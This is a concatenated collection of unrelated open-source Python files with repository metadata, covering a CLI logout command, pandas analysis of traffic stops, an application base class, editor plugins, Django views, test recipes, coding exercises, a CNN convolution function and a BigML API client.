/xai/brain/wordbase/otherforms/_pricier.py
|
17e602d16998edcee93d654fd2ff4a313028fae5
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 220
|
py
|
#calss header
class _PRICIER():
def __init__(self,):
self.name = "PRICIER"
self.definitions = pricy
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['pricy']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
020d3a02c9aba18d9ceb63b09b9389dd7f395e1e
|
c1bfadbc033efba287ad55a804e9d69d297c3bf2
|
/valohai_cli/commands/logout.py
|
bf4821b4666e80b85d595e51d78ca79a387cdd40
|
[
"MIT"
] |
permissive
|
valohai/valohai-cli
|
16560b078d20a02c8cdc7388beeea9bebac4be7d
|
c57cc164e749fb77b622d629a5ad05b2685534bb
|
refs/heads/master
| 2023-08-31T14:04:26.979762
| 2023-08-22T12:54:51
| 2023-08-22T12:54:51
| 81,329,264
| 14
| 5
|
MIT
| 2023-09-11T13:35:04
| 2017-02-08T12:46:54
|
Python
|
UTF-8
|
Python
| false
| false
| 735
|
py
|
import click
from valohai_cli.consts import yes_option
from valohai_cli.messages import success
from valohai_cli.settings import settings
@click.command()
@yes_option
def logout(yes: bool) -> None:
"""Remove local authentication token."""
user = settings.user
token = settings.token
if not (user or token):
click.echo('You\'re not logged in.')
return
if user and not yes:
click.confirm((
f'You are logged in as {user["username"]} (on {settings.host}).\n'
'Are you sure you wish to remove the authentication token?'
), abort=True)
settings.persistence.update(host=None, user=None, token=None)
settings.persistence.save()
success('Logged out.')
|
[
"akx@iki.fi"
] |
akx@iki.fi
|
3db2907e0ec1a60da6727317afaec49ef2217e4c
|
96ad67554b01832b873fc0bdab0c33aa2178a2fd
|
/3_visualExploratory/3_violationDistrict.py
|
ac3f3009cd46c72bad29b203a4a88e5a3d37b070
|
[] |
no_license
|
RobertNguyen125/Datacamp---Project-PoliceActivities
|
09447ee1290c40b3c038ccd387e80c7e703cb053
|
af14e4d7c4ff864f68cfa3aaecdfee9883c24659
|
refs/heads/master
| 2021-01-02T02:00:15.928445
| 2020-02-10T06:48:13
| 2020-02-10T06:48:13
| 239,445,139
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 812
|
py
|
# .crosstab(), short for cross_tabulation
import pandas as pd
import matplotlib.pyplot as plt
ri2 = pd.read_csv('/Users/apple/desktop/policeActivities/dataset/ri2.csv')
table = pd.crosstab(ri2['driver_race'], ri2['driver_gender']) # NOTE: frequency table in form of dataframe
print(table)
# check the result of frequency table
asian_female = ri2[(ri2['driver_gender']=='F') & (ri2['driver_race']=='Asian')]
print(asian_female.shape)
table = table.loc['Asian':'Hispanic']
print(table)
# create stacked bar plot
# table.plot(kind='bar', stacked=True)
# plt.show()
# district violation
# create frequency table with distric and violation
all_zones = pd.crosstab(ri2['district'],ri2['violation'])
print(all_zones)
# slice the dataframe to get k1-k3:
k_zones = all_zones.loc['Zone K1': 'Zone K3']
print(k_zones)
|
[
"ngaduc92@gmail.com"
] |
ngaduc92@gmail.com
|
4fa0a7eb80583b752126f933c7de41b6086d7e94
|
f9e3a0fb511470561d3d94bc984dafaee06000cb
|
/9780596009250/PP3E-Examples-1.2/Examples/PP3E/System/App/Bases/app.py
|
9e971584749335e8bfed0687516b1d673471aca7
|
[
"LicenseRef-scancode-oreilly-notice"
] |
permissive
|
Sorath93/Programming-Python-book
|
359b6fff4e17b44b9842662f484bbafb490cfd3d
|
ebe4c93e265edd4ae135491bd2f96904d08a911c
|
refs/heads/master
| 2022-12-03T01:49:07.815439
| 2020-08-16T22:19:38
| 2020-08-16T22:19:38
| 287,775,012
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,823
|
py
|
################################################################################
# an application class hierarchy, for handling top-level components;
# App is the root class of the App hierarchy, extended in other files;
################################################################################
import sys, os, traceback
class AppError(Exception): pass # errors raised here
class App: # the root class
def __init__(self, name=None):
self.name = name or self.__class__.__name__ # the lowest class
self.args = sys.argv[1:]
self.env = os.environ
self.verbose = self.getopt('-v') or self.getenv('VERBOSE')
self.input = sys.stdin
self.output = sys.stdout
self.error = sys.stderr # stdout may be piped
def closeApp(self): # not __del__: ref's?
pass # nothing at this level
def help(self):
print self.name, 'command-line arguments:' # extend in subclass
print '-v (verbose)'
##############################
# script environment services
##############################
def getopt(self, tag):
try: # test "-x" command arg
self.args.remove(tag) # not real argv: > 1 App?
return 1
except:
return 0
def getarg(self, tag, default=None):
try: # get "-x val" command arg
pos = self.args.index(tag)
val = self.args[pos+1]
self.args[pos:pos+2] = []
return val
except:
return default # None: missing, no default
def getenv(self, name, default=''):
try: # get "$x" environment var
return self.env[name]
except KeyError:
return default
def endargs(self):
if self.args:
self.message('extra arguments ignored: ' + repr(self.args))
self.args = []
def restargs(self):
res, self.args = self.args, [] # no more args/options
return res
def message(self, text):
self.error.write(text + '\n') # stdout may be redirected
def exception(self):
return tuple(sys.exc_info()[:2]) # the last exception type,data
def exit(self, message='', status=1):
if message:
self.message(message)
sys.exit(status)
def shell(self, command, fork=0, inp=''):
if self.verbose:
self.message(command) # how about ipc?
if not fork:
os.system(command) # run a shell cmd
elif fork == 1:
return os.popen(command, 'r').read() # get its output
else: # readlines too?
pipe = os.popen(command, 'w')
pipe.write(inp) # send it input
pipe.close()
#################################################
# input/output-stream methods for the app itself;
# redefine in subclasses if not using files, or
# set self.input/output to file-like objects;
#################################################
def read(self, *size):
return self.input.read(*size)
def readline(self):
return self.input.readline()
def readlines(self):
return self.input.readlines()
def write(self, text):
self.output.write(text)
def writelines(self, text):
self.output.writelines(text)
###################################################
# to run the app
# main() is the start/run/stop execution protocol;
###################################################
def main(self):
res = None
try:
self.start()
self.run()
res = self.stop() # optional return val
except SystemExit: # ignore if from exit()
pass
except:
self.message('uncaught: ' + str(self.exception()))
traceback.print_exc()
self.closeApp()
return res
def start(self):
if self.verbose: self.message(self.name + ' start.')
def stop(self):
if self.verbose: self.message(self.name + ' done.')
def run(self):
raise AppError, 'run must be redefined!'
|
[
"Sorath.Soomro@isode.com"
] |
Sorath.Soomro@isode.com
|
1376fbee52bacc27bd80efd4d16b435c5e946b03
|
549270020f6c8724e2ef1b12e38d11b025579f8d
|
/recipes/libnetfilter_queue/all/test_package/conanfile.py
|
1097433829a7c2a75801555fd3e085e9063cd7b5
|
[
"MIT"
] |
permissive
|
conan-io/conan-center-index
|
1bcec065ccd65aa38b1fed93fbd94d9d5fe6bc43
|
3b17e69bb4e5601a850b6e006e44775e690bac33
|
refs/heads/master
| 2023-08-31T11:34:45.403978
| 2023-08-31T11:13:23
| 2023-08-31T11:13:23
| 204,671,232
| 844
| 1,820
|
MIT
| 2023-09-14T21:22:42
| 2019-08-27T09:43:58
|
Python
|
UTF-8
|
Python
| false
| false
| 469
|
py
|
import os
from conans import ConanFile, CMake, tools
class Libnetfilter_queueTestConan(ConanFile):
settings = "os", "compiler", "build_type", "arch"
generators = "cmake"
def build(self):
cmake = CMake(self)
cmake.configure()
cmake.build()
def test(self):
if not tools.cross_building(self):
bin_path = os.path.join("bin", "example")
self.run("{} {}".format(bin_path, 0), run_environment=True)
|
[
"noreply@github.com"
] |
conan-io.noreply@github.com
|
8263c0e2c597868a62777d0b2bf18d2d862238d2
|
632d7759536ed0726499c2d52c8eb13b5ab213ab
|
/Data/Packages/Default/swap_line.py
|
5c098bc61d83d61eb12c2cf637e2417ebeab613c
|
[] |
no_license
|
Void2403/sublime_text_3_costomize
|
e660ad803eb12b20e9fa7f8eb7c6aad0f2b4d9bc
|
c19977e498bd948fd6d8f55bd48c8d82cbc317c3
|
refs/heads/master
| 2023-08-31T21:32:32.791574
| 2019-05-31T11:46:19
| 2019-05-31T11:46:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,886
|
py
|
import sublime
import sublime_plugin
def expand_to_line(view, region):
"""
As view.full_line, but doesn't expand to the next line if a full line is
already selected
"""
if not (region.a == region.b) and view.substr(region.end() - 1) == '\n':
return sublime.Region(view.line(region).begin(), region.end())
else:
return view.full_line(region)
def extract_line_blocks(view):
blocks = [expand_to_line(view, s) for s in view.sel()]
if len(blocks) == 0:
return blocks
# merge any adjacent blocks
merged_blocks = [blocks[0]]
for block in blocks[1:]:
last_block = merged_blocks[-1]
if block.begin() <= last_block.end():
merged_blocks[-1] = sublime.Region(last_block.begin(), block.end())
else:
merged_blocks.append(block)
return merged_blocks
class SwapLineUpCommand(sublime_plugin.TextCommand):
def run(self, edit):
blocks = extract_line_blocks(self.view)
# No selection
if len(blocks) == 0:
return
# Already at BOF
if blocks[0].begin() == 0:
return
# Add a trailing newline if required, the logic is simpler if every line
# ends with a newline
add_trailing_newline = (self.view.substr(self.view.size() - 1) != '\n') and blocks[-1].b == self.view.size()
if add_trailing_newline:
# The insert can cause the selection to move. This isn't wanted, so
# reset the selection if it has moved to EOF
sel = [r for r in self.view.sel()]
self.view.insert(edit, self.view.size(), '\n')
if self.view.sel()[-1].end() == self.view.size():
# Selection has moved, restore the previous selection
self.view.sel().clear()
for r in sel:
self.view.sel().add(r)
# Fix up any block that should now include this newline
blocks[-1] = sublime.Region(blocks[-1].a, blocks[-1].b + 1)
# Process in reverse order
blocks.reverse()
for b in blocks:
prev_line = self.view.full_line(b.begin() - 1)
self.view.insert(edit, b.end(), self.view.substr(prev_line))
self.view.erase(edit, prev_line)
if add_trailing_newline:
# Remove the added newline
self.view.erase(edit, sublime.Region(self.view.size() - 1, self.view.size()))
# Ensure the selection is visible
self.view.show(self.view.sel(), False)
class SwapLineDownCommand(sublime_plugin.TextCommand):
def run(self, edit):
blocks = extract_line_blocks(self.view)
# No selection
if len(blocks) == 0:
return
# Already at EOF
if blocks[-1].end() == self.view.size():
return
# Add a trailing newline if required, the logic is simpler if every line
# ends with a newline
add_trailing_newline = (self.view.substr(self.view.size() - 1) != '\n')
if add_trailing_newline:
# No block can be at EOF (checked above), so no need to fix up the
# blocks
self.view.insert(edit, self.view.size(), '\n')
# Process in reverse order
blocks.reverse()
for b in blocks:
next_line = self.view.full_line(b.end())
contents = self.view.substr(next_line)
self.view.erase(edit, next_line)
self.view.insert(edit, b.begin(), contents)
if add_trailing_newline:
# Remove the added newline
self.view.erase(edit, sublime.Region(self.view.size() - 1, self.view.size()))
# Ensure the selection is visible
self.view.show(self.view.sel(), False)
|
[
"guan2296107714@126.com"
] |
guan2296107714@126.com
|
e62ab15957a3c82e8578924508c3baeabde046be
|
b550eda62179ffd8e49a59df7f8a30163140204f
|
/backend/openshift-old/services/job/worker/src/nodes/requests/openshift.py
|
169b62b8c283420c6106a524f7d57862ca40833b
|
[
"Apache-2.0"
] |
permissive
|
bgoesswe/openeo-repeatability
|
6222fb235b70fda9da998b63fec92c0e5ac07169
|
087b9965e710d16cd6f29cb25e2cb94e443c2b30
|
refs/heads/master
| 2022-12-11T03:43:35.365574
| 2018-08-07T20:02:02
| 2018-08-07T20:02:02
| 139,158,921
| 0
| 1
| null | 2022-12-08T02:15:15
| 2018-06-29T14:27:34
|
Python
|
UTF-8
|
Python
| false
| false
| 801
|
py
|
from os import environ
from utils import send_post
# OPENSHIFT_URL = environ.get("OPENSHIFT_API")
# OPENSHIFT_AUTH = auth = {"Authorization": "Bearer " + environ.get("SERVICEACCOUNT_TOKEN")}
# OPENSHIFT_NAMESPACE = environ.get("EXECUTION_NAMESPACE")
# OPENSHIFT_STORAGE_CLASS = environ.get("STORAGE_CLASS")
# OPENSHIFT_VERIFY = True if environ.get("VERIFY") == "true" else False
# def execute_template(path, template):
# url = "{0}/{1}".format(OPENSHIFT_URL, path)
# send_post(url, template, OPENSHIFT_AUTH, OPENSHIFT_VERIFY)
# url = environ.get("OPENSHIFT_API") + self.path
# response = post(url, data=self.get_json(), headers=auth, verify=verify)
# verify =
# # Execute template
# if response.ok == False:
# self.raise_error(response.text)
# self.status = "Created"
|
[
"bernhard.goesswein@geo.tuwien.ac.at"
] |
bernhard.goesswein@geo.tuwien.ac.at
|
72455241a618db9120f1ce31fffb5ed5a14566bd
|
fbfb724f8d0c3a6b64b2d6773c6f723bedb9f7f5
|
/Python/Django_full/courses/apps/course_app/views.py
|
49c2de66092e1c0453f40735e9ff07ab1f17f2ca
|
[] |
no_license
|
eddieverity/DojoAssignments
|
32ae4a1de768069d6636d1f109845e86bb20dec5
|
8860b4ca87633e722fa5aa93952ea719e9e95413
|
refs/heads/master
| 2020-04-06T03:59:56.185985
| 2017-04-26T18:04:41
| 2017-04-26T18:04:41
| 83,149,714
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 763
|
py
|
from django.shortcuts import render, redirect, HttpResponse
from .models import Course, Description, Comment
# Create your views here.
def index(request):
course=Course.objects.all()
desc= Description.objects.all()
context = {
"courses": course,
"desc": desc
}
return render(request, "course_app/index.html", context)
def go_back(request):
return redirect('/')
def add(request):
course = Course.objects.create(name=request.POST['name']) # course automatically getting assigned course_id, then referenced in description.create below
Description.objects.create(desc=request.POST['desc'], course=course)
return redirect('/')
def delete(request, id):
instance = Course.objects.filter(id = id).delete()
return redirect('/')
|
[
"eddieverity@gmail.com"
] |
eddieverity@gmail.com
|
a5146ae5de1b53ffccabf6a5318027797a5bb10a
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_psoriasis.py
|
8b4a1ae76769598d8296034103fda0e42994b41d
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 373
|
py
|
#calss header
class _PSORIASIS():
def __init__(self,):
self.name = "PSORIASIS"
self.definitions = [u'a disease in which areas of skin turn red and are covered with small dry pieces of skin']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
ac87a80c7946de405af73d9d842c2e7763946960
|
fee6d256bb4430569f9c055735d5f52a04afac45
|
/admin/town_get.py
|
3c317a73eecfa09a13f9b9e9edfd840faf725e1f
|
[] |
no_license
|
microprediction/pandemic
|
633367e3a11af1418e255a595b4c01a9c1f4c1bb
|
4ca339b8c6e1925d7d70e9659b34e7cf8d7b534b
|
refs/heads/master
| 2021-05-23T15:27:12.726299
| 2020-11-12T13:52:56
| 2020-11-12T13:52:56
| 253,360,903
| 9
| 8
| null | 2020-05-18T14:00:25
| 2020-04-06T00:34:55
|
Python
|
UTF-8
|
Python
| false
| false
| 260
|
py
|
from pandemic.config_private import REDIS_CONFIG
from pprint import pprint
import json
if __name__=="__main__":
import redis
r = redis.Redis(**REDIS_CONFIG)
key = '00021250616501801290085'
data = r.hgetall(name='town::hash')
pprint(data)
|
[
"info@3za.org"
] |
info@3za.org
|
7aba0b9e83fa79101172ddd4c5618b3be76aada9
|
d17a8870ff8ac77b82d0d37e20c85b23aa29ca74
|
/lite/tests/unittest_py/op/common/test_unsqueeze_op_base.py
|
2501e10cdaad936fb10b222f6afd2e47286d2faa
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/Paddle-Lite
|
4ab49144073451d38da6f085a8c56822caecd5b2
|
e241420f813bd91f5164f0d9ee0bc44166c0a172
|
refs/heads/develop
| 2023-09-02T05:28:14.017104
| 2023-09-01T10:32:39
| 2023-09-01T10:32:39
| 104,208,128
| 2,545
| 1,041
|
Apache-2.0
| 2023-09-12T06:46:10
| 2017-09-20T11:41:42
|
C++
|
UTF-8
|
Python
| false
| false
| 2,275
|
py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('..')
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import numpy as np
from functools import partial
from typing import Optional, List, Callable, Dict, Any, Set
import unittest
import hypothesis
from hypothesis import assume
import hypothesis.strategies as st
def sample_program_configs(draw):
in_shape = draw(
st.lists(
st.integers(
min_value=1, max_value=5), min_size=4, max_size=4))
axes_data = draw(
st.lists(
st.integers(
min_value=0, max_value=3), min_size=1, max_size=2))
def generate_AxesTensor_data():
return np.random.choice([0, 1, 2, 3], axes_data, replace=True)
def generate_AxesTensorList_data():
return np.random.choice([0, 1, 2, 3], [], replace=True)
unsqueeze_op = OpConfig(
type="unsqueeze",
inputs={
"X": ["X_data"],
"AxesTensor": ["AxesTensor_data"],
"AxesTensorList": ["AxesTensorList_data"]
},
outputs={"Out": ["Out_data"]},
attrs={"axes": axes_data, })
program_config = ProgramConfig(
ops=[unsqueeze_op],
weights={},
inputs={
"X_data": TensorConfig(shape=in_shape),
"AxesTensor_data":
TensorConfig(data_gen=partial(generate_AxesTensor_data)),
# TensorList is not supported ,so comment them out
"AxesTensorList_data":
TensorConfig(data_gen=partial(generate_AxesTensorList_data))
},
outputs=["Out_data"])
return program_config
|
[
"noreply@github.com"
] |
PaddlePaddle.noreply@github.com
|
d86b2af56d25376ca533a9b8f5974a461cddc95f
|
41e22cef6ded081632f21cd3877884f76c69bef3
|
/flaskmob/api.py
|
2835e31958cc88e0b8e048455be2281aea280abb
|
[
"MIT"
] |
permissive
|
brotherjack/Flask-Mob
|
737cac3623c8a062653e2eefa981de30526b4510
|
f0f4f5fe79f2fe7e63c2f882dc4b5d61276dbf45
|
refs/heads/master
| 2021-01-20T09:37:26.091977
| 2017-03-04T22:09:56
| 2017-03-04T22:09:56
| 83,924,618
| 0
| 0
| null | 2017-03-04T21:03:59
| 2017-03-04T21:03:59
| null |
UTF-8
|
Python
| false
| false
| 1,012
|
py
|
from flask import jsonify
from flaskmob import app, db
from flask_restful import Resource, Api
api = Api(app)
class Pokeymon(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String, unique=True)
color = db.Column(db.String)
def __init__(self, name, color=None):
if not color:
color = "Not Specified"
self.name = name
self.color = color
def __repr__(self):
return str(self.name)
class PokeymonNapTime(Resource):
def get(self, name):
result = Pokeymon.query.filter_by(name=name).first()
del result.__dict__['_sa_instance_state']
return jsonify(result.__dict__)
def post(self, name, color=None):
new_pokeymon = Pokeymon(name, color)
db.session.add(new_pokeymon)
try:
db.session.commit()
except:
db.session.rollback()
raise
return "Success"
api.add_resource(PokeymonNapTime, "/api/1.0/pokeyman/<string:name>")
|
[
"michael@mdupont.com"
] |
michael@mdupont.com
|
d84f0b803d8be1aa81bc7e7291137ca415656a52
|
9870d2c6880fd3fa558c46e3bf160aae20c74157
|
/removeNthFromEnd.py
|
5719f47e75ed040bbcce08e05727590f9c52fbbc
|
[] |
no_license
|
Yigang0622/LeetCode
|
e7f7f115c6e730c486296ef2f1a3dd1a3fdca526
|
c873cd1ee70a2bdb54571bdd50733db9f6475e9e
|
refs/heads/master
| 2023-03-03T14:32:25.498633
| 2021-02-15T13:59:00
| 2021-02-15T13:59:00
| 281,423,565
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,322
|
py
|
# LeetCode
# removeNthFromEnd
# Created by Yigang Zhou on 2020/7/22.
# Copyright © 2020 Yigang Zhou. All rights reserved.
# 给定一个链表,删除链表的倒数第 n 个节点,并且返回链表的头结点。
#
# 示例:
#
# 给定一个链表: 1->2->3->4->5, 和 n = 2.
#
# 当删除了倒数第二个节点后,链表变为 1->2->3->5.
# 说明:
#
# 给定的 n 保证是有效的。
#
# 进阶:
#
# 你能尝试使用一趟扫描实现吗?
#Definition for singly-linked list.
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
def printLinkedList(head: ListNode):
while head is not None:
print(head.val)
head = head.next
class Solution:
def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:
arr = []
while head is not None:
arr.append(head)
head = head.next
if len(arr) == 1:
return []
i = len(arr) - n - 1
if i == -1:
printLinkedList(arr[1])
return arr[1]
else:
arr[i].next = arr[i].next.next
printLinkedList(arr[0])
return arr[0]
n = ListNode(1)
n2 = ListNode(2)
n3 = ListNode(3)
n4 = ListNode(4)
n.next = n2
n2.next = n3
n3.next = n4
s = Solution().removeNthFromEnd(n,4)
|
[
"zhou@zygmail.com"
] |
zhou@zygmail.com
|
13549ec011843c3269631dae4df79481e9adcee9
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03759/s647507996.py
|
7c66b69c12d94e46dcce65b1e8b12fc11d1775b6
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
i = list(map(int, input().split()))
a=i[0]
b=i[1]
c=i[2]
j_1 = b-a
j_2=c-b
if j_1==j_2:
print('YES')
else :
print('NO')
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
54dc0172f201f8adc5440482208dbc2e4a20f88b
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/Fe6wvtjcNFwuANuLu_1.py
|
19b5746b7b1b7d4c659dd13e0c67a617790fb718
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 938
|
py
|
"""
A game of table tennis almost always sounds like _Ping!_ followed by _Pong!_
Therefore, you know that Player 2 has won if you hear _Pong!_ as the last
sound (since Player 1 didn't return the ball back).
Given a list of _Ping!_ , create a function that inserts _Pong!_ in between
each element. Also:
* If `win` equals `True`, end the list with _Pong!_.
* If `win` equals `False`, end with _Ping!_ instead.
### Examples
ping_pong(["Ping!"], True) ➞ ["Ping!", "Pong!"]
ping_pong(["Ping!", "Ping!"], False) ➞ ["Ping!", "Pong!", "Ping!"]
ping_pong(["Ping!", "Ping!", "Ping!"], True) ➞ ["Ping!", "Pong!", "Ping!", "Pong!", "Ping!", "Pong!"]
### Notes
* You will always return the ball (i.e. the Pongs are yours).
* Player 1 serves the ball and makes _Ping!_.
* Return a list of strings.
"""
def ping_pong(lst, win):
res = ['Ping!','Pong!'] * len(lst)
return res if win else res[:-1]
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
d8656572c733b1f9a10bc318e47dbba7721dca6b
|
beea74a2a1f2445b107af411197e8b6300e715e6
|
/supervised_learning/0x07-cnn/0-conv_forward.py
|
ce94808fac80cec28daaffce4ba0d4471128adfc
|
[] |
no_license
|
95ktsmith/holbertonschool-machine_learning
|
0240d8fa8523b06d3353c2bffa74205b84253be8
|
2757c8526290197d45a4de33cda71e686ddcbf1c
|
refs/heads/master
| 2023-07-26T16:02:26.399758
| 2021-09-09T15:57:57
| 2021-09-09T15:57:57
| 310,087,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,360
|
py
|
#!/usr/bin/env python3
""" Convolution forward propagation """
import numpy as np
def conv_forward(A_prev, W, b, activation, padding="same", stride=(1, 1)):
"""
Performs forward propagation over a convolutional layer of a neural network
A_prev is a numpy.ndarray of shape (m, h_prev, w_prev, c_prev) containing
the output of the previous layer
m is the number of examples
h_prev is the height of the previous layer
w_prev is the width of the previous layer
c_prev is the number of channels in the previous layer
W is a numpy.ndarray of shape (kh, kw, c_prev, c_new) containing the
kernels for the convolution
kh is the filter height
kw is the filter width
c_prev is the number of channels in the previous layer
c_new is the number of channels in the output
b is a numpy.ndarray of shape (1, 1, 1, c_new) containing the biases
applied to the convolution
activation is an activation function applied to the convolution
padding is a string that is either same or valid, indicating the type of
padding used
stride is a tuple of (sh, sw) containing the strides for the convolution
sh is the stride for the height
sw is the stride for the width
Returns: the output of the convolutional layer
"""
m, h_prev, w_prev, c_prev = A_prev.shape
kh, kw, c_prev, c_new = W.shape
sh = stride[0]
sw = stride[1]
if padding == "valid":
ph = 0
pw = 0
ch = int((h_prev - kh) / sh + 1)
cw = int((w_prev - kw) / sw + 1)
else: # padding == "same"
ch = h_prev
cw = w_prev
ph = int((ch * sh - h_prev + kh - 1) / 2)
pw = int((cw * sw - w_prev + kw - 1) / 2)
padded = np.pad(A_prev,
((0, 0), (ph, ph), (pw, pw), (0, 0)),
'constant',
constant_values=0)
convolved = np.zeros((m, ch, cw, c_new))
for channel in range(c_new):
for row in range(ch):
for col in range(cw):
mask = padded[:, row*sh:row*sh + kh, col*sw:col*sw + kw, :] *\
W[None, :, :, :, channel]
out = np.sum(mask, axis=(1, 2, 3)) + b[:, :, :, channel]
convolved[:, row, col, channel] = activation(out)
return convolved
|
[
"95ktsmith@gmail.com"
] |
95ktsmith@gmail.com
|
3c516ada6af314021aa4340dc715126b4d3b5c3d
|
2e94ded940d9a8015f5cf877bfbef71a77b5ddaf
|
/bigml/api_handlers/clusterhandler.py
|
133a66bc205f295795f8d4e768542ab1a9575aa3
|
[
"Apache-2.0",
"LicenseRef-scancode-public-domain"
] |
permissive
|
mmerce/python
|
9ac63efacec3e54285a969b6c6279eeba6bceb78
|
696ddc2a10c985cfe266ec2807c24b98f0c9a317
|
refs/heads/master
| 2023-08-04T09:10:17.016748
| 2020-11-10T23:43:34
| 2020-11-10T23:43:34
| 5,256,921
| 0
| 0
| null | 2017-10-03T22:54:20
| 2012-08-01T08:38:09
|
Python
|
UTF-8
|
Python
| false
| false
| 3,898
|
py
|
# -*- coding: utf-8 -*-
#
# Copyright 2014-2020 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Base class for clusters' REST calls
https://bigml.com/api/clusters
"""
try:
import simplejson as json
except ImportError:
import json
from bigml.api_handlers.resourcehandler import ResourceHandlerMixin
from bigml.api_handlers.resourcehandler import check_resource_type, \
resource_is_ready, get_cluster_id
from bigml.constants import CLUSTER_PATH
class ClusterHandlerMixin(ResourceHandlerMixin):
"""This class is used by the BigML class as
a mixin that provides the REST calls models. It should not
be instantiated independently.
"""
def __init__(self):
"""Initializes the ClusterHandler. This class is intended to be
used as a mixin on ResourceHandler, that inherits its
attributes and basic method from BigMLConnection, and must not be
instantiated independently.
"""
self.cluster_url = self.url + CLUSTER_PATH
def create_cluster(self, datasets, args=None, wait_time=3, retries=10):
"""Creates a cluster from a `dataset` or a list o `datasets`.
"""
create_args = self._set_create_from_datasets_args(
datasets, args=args, wait_time=wait_time, retries=retries)
body = json.dumps(create_args)
return self._create(self.cluster_url, body)
def get_cluster(self, cluster, query_string='',
shared_username=None, shared_api_key=None):
"""Retrieves a cluster.
The model parameter should be a string containing the
cluster id or the dict returned by create_cluster.
As cluster is an evolving object that is processed
until it reaches the FINISHED or FAULTY state, the function will
return a dict that encloses the cluster values and state info
available at the time it is called.
If this is a shared cluster, the username and sharing api key must
also be provided.
"""
check_resource_type(cluster, CLUSTER_PATH,
message="A cluster id is needed.")
return self.get_resource(cluster,
query_string=query_string,
shared_username=shared_username,
shared_api_key=shared_api_key)
def cluster_is_ready(self, cluster, **kwargs):
"""Checks whether a cluster's status is FINISHED.
"""
check_resource_type(cluster, CLUSTER_PATH,
message="A cluster id is needed.")
resource = self.get_cluster(cluster, **kwargs)
return resource_is_ready(resource)
def list_clusters(self, query_string=''):
"""Lists all your clusters.
"""
return self._list(self.cluster_url, query_string)
def update_cluster(self, cluster, changes):
"""Updates a cluster.
"""
check_resource_type(cluster, CLUSTER_PATH,
message="A cluster id is needed.")
return self.update_resource(cluster, changes)
def delete_cluster(self, cluster):
"""Deletes a cluster.
"""
check_resource_type(cluster, CLUSTER_PATH,
message="A cluster id is needed.")
return self.delete_resource(cluster)
|
[
"merce@bigml.com"
] |
merce@bigml.com
|
6eab9a88af0ceee39b0d08197e81ce32a0290429
|
88ae8695987ada722184307301e221e1ba3cc2fa
|
/third_party/grpc/src/src/python/grpcio_csds/setup.py
|
6523648516b6ebe0624f0243eb91978bdf3a3b93
|
[
"Apache-2.0",
"LGPL-2.0-or-later",
"MIT",
"GPL-1.0-or-later",
"BSD-3-Clause",
"MPL-2.0"
] |
permissive
|
iridium-browser/iridium-browser
|
71d9c5ff76e014e6900b825f67389ab0ccd01329
|
5ee297f53dc7f8e70183031cff62f37b0f19d25f
|
refs/heads/master
